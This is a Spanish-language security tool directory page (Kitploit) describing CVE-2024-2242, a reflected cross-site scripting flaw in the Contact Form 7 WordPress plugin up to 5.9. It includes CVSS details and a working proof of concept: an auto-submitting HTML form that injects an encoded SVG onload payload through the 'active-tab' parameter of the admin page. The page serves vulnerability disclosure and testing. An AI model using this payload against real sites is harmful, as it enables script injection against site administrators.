Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-2242 — Contact Form 7 <= 5.9 - Cross-Site Scripting Reflejado | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-2242
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubrandomrobbiebf/cve-2024-2242

CVE-2024-2242

Contact Form 7 <= 5.9 - Cross-Site Scripting Reflejado

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-2242

Contact Form 7 <= 5.9 - Cross-Site Scripting Reflejado

Descripción

El plugin Contact Form 7 para WordPress es vulnerable a Cross-Site Scripting Reflejado a través del parámetro 'active-tab' en todas las versiones hasta, e incluyendo, la 5.9 debido a una insuficiente sanitización de entrada y escape de salida. Esto permite que atacantes no autenticados inyecten scripts web arbitrarios en páginas que se ejecutan si logran engañar a un usuario para que realice una acción como hacer clic en un enlace.

root@kitploit:~
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13

POC

Necesitas conocer el valor del ID de la entrada (post) donde se encuentra el formulario, de lo contrario, cuando el administrador haga clic en el enlace no funcionará. En general, esto debería tener privilegios requeridos como Alto, ya que se necesita que un administrador haga clic en el enlace.

root@kitploit:~
<html>

  <body>
    <form action="http://kubernetes.docker.internal/wp-admin/admin.php">
      <input type="hidden" name="page" value="wpcf7" />
      <input type="hidden" name="post" value="4478" />
      <input type="hidden" name="active&#45;tab" value="&apos;&quot;&gt;&lt;svg&#47;onload&#61;prompt&#40;7&#41;&#59;&gt;&#123;&#123;7&#42;7&#125;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Descargar herramienta